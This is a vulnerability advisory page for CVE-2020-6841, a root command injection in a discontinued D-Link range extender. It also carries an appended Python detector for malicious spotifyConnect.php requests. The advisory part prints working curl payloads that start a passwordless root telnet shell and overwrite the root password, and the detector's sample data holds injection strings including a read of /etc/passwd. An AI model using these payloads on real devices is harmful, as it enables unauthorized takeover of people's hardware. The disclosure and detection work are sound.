AttackerKB AKB:337E2206-259F-4FA9-82D8-9DCDF70019FC
History: Feb 21, 2020 - 12:00 a.m.

CVE-2020-6841

attackerkb.com

EPSS

0.024

Percentile

90.1%

D-Link DCH-M225 1.05b01 and earlier devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the spotifyConnect.php userName parameter.

Recent assessments:

kevthehermit at February 22, 2020 10:59pm UTC reported:

This analysis is a transcript of a public gist – Original Source – <https://gist.github.com/jezzaaa/38c752d0a129576b2cc523ce6325050f>

D-Link DCH-M225 1.04 devices allow remote attackers to execute
arbitrary OS commands via shell metacharacters in the
spotifyConnect.php userName parameter.


[Additional Information]
From the local network (eg wifi), access the URL
<http://ip-address/spotifyConnect.php> with POST variables:

action=addUser userName=;/usr/sbin/telnetd -i br0 >/dev/null &;

For example, from a Linux command-line:

curl -d 'action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;' <http://192.168.0.50/spotifyConnect.php>

This starts a telnet daemon that provides a root shell with no
password. Then telnet to the device for a root shell.

The same exploit can be used to temporarily change the root password,
using something like:

curl -d 'action=addUser&userName=;echo "\"Admin\" \"\" \"0\"">/var/passwd.new;' <http://192.168.1.204/spotifyConnect.php>

This exploit would also work on a network that exposes port 80 on the
device to the Internet, in which case this would allow a remote root
shell to an unprivileged user.

The vendor has stated that the device has been discontinued (as of
April 2018), and that they won’t be patching.

The vulnerable “Spotify Connect” feature of the product may have been
implemented on other devices that are still for sale or still under
support, possibly using the same vulnerable code implemented in
spotifyCode.php on this device. The vendor has been asked if any
of their other products use the same code, but they did not answer
this question.


[VulnerabilityType Other]
command injection (missing input validation, escaping)


[Vendor of Product]
D-Link


[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04


[Affected Component]
script spotifyConnect.php


[Attack Type]
Local


[Attack Vectors]
Submit HTTP request to add a Spotify Connect user (no admin auth
required), using a username containing a semicolon followed by an
arbitrary command (which runs as root) such as telnetd or commands to
modify the admin user’s password.


[References]
<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152>
<https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender>
<https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf>
<https://www.dlink.com/en/security-bulletin>

Assessed Attacker Value: 2
Assessed Attacker Value: 5
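As an added defender-side example (not code from the assessment, the gist, or the vendor), this Python script parses sample POST bodies sent to spotifyConnect.php, flags any userName value that carries shell metacharacters, and shows the allowlist check that the page says the handler lacks. The log tuple layout, the SHELL_META set and the SAFE_USERNAME pattern are assumptions; the sample requests are constructed, with the second one being the telnetd body quoted above.

```python
import re
from urllib.parse import parse_qs

# Characters that let a value break out of a shell command string
# (assumption: a defender's flag list, not taken from the device firmware).
SHELL_META = re.compile(r"[;&|`$<>\\'\"(){}\n]")

# Assumed allowlist for a legitimate Spotify Connect user name; the device's
# real rules are not published, so this is a deliberately conservative guess.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")

# Constructed sample requests (client IP, path, raw POST body), as a reverse
# proxy or WAF in front of the extender might record them.
SAMPLE_REQUESTS = [
    ("10.0.0.7", "/spotifyConnect.php", "action=addUser&userName=alice"),
    ("10.0.0.9", "/spotifyConnect.php",
     "action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;"),
    ("10.0.0.9", "/spotifyConnect.php",
     "action=addUser&userName=bob%3Bcat+/etc/passwd"),
    ("10.0.0.7", "/index.php", "userName=;id"),
    ("10.0.0.7", "/spotifyConnect.php", "action=delUser&userName=carol"),
]


def is_safe_username(name: str) -> bool:
    """The input validation the page says is missing: allowlisted chars only."""
    return bool(SAFE_USERNAME.match(name))


def flag_request(client: str, path: str, body: str):
    """Return a finding for a suspicious spotifyConnect.php request, else None."""
    if not path.endswith("/spotifyConnect.php"):
        return None
    # parse_qs splits on '&' and percent-decodes, as the PHP handler would
    params = parse_qs(body, keep_blank_values=True)
    user = params.get("userName", [""])[0]
    meta = sorted(set(SHELL_META.findall(user)))
    if not meta:
        return None
    return {
        "client": client,
        "action": params.get("action", [""])[0],
        "userName": user,
        "metachars": meta,
    }


def scan(requests=SAMPLE_REQUESTS):
    """Run flag_request over every sample and return the list of findings."""
    return [f for f in (flag_request(*r) for r in requests) if f]


if __name__ == "__main__":
    for finding in scan():
        print(finding)
```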
